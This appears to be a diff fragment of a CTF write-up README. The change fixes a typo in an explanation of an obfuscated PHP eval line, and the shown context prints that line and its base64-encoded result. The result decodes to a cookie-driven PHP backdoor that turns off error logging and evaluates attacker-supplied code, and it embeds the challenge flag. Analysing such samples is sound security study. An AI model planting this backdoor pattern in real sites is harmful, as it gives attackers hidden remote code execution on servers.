X-Vector/CTF/Bsides/README.md

 eval($gj($iuq("ec", "", $kyo1.$kyo2.$kyo3.$kyo4)));
 ?>
 ```
-- first the variable `$iuq` containe a php build in function which is used to replcae any this words `ec` in this variables `$kyo1,$kyo2,$kyo3,$kyo4` with nothing then when excute the code the output will be
+- first the variable `$iuq` containe a php built in function which is used to replcae any this words `ec` in this variables `$kyo1,$kyo2,$kyo3,$kyo4` with nothing then when excute the code the output will be

 ```
 JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdmbCcgJiYgJGMoJGEpPjMpe2luaV9zZXQoJ2Vycm9yX2xvZycsICcvZGV2L251bGwnKTskaz0nYWd7aGlkZGVuX2luX3BocH0nO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9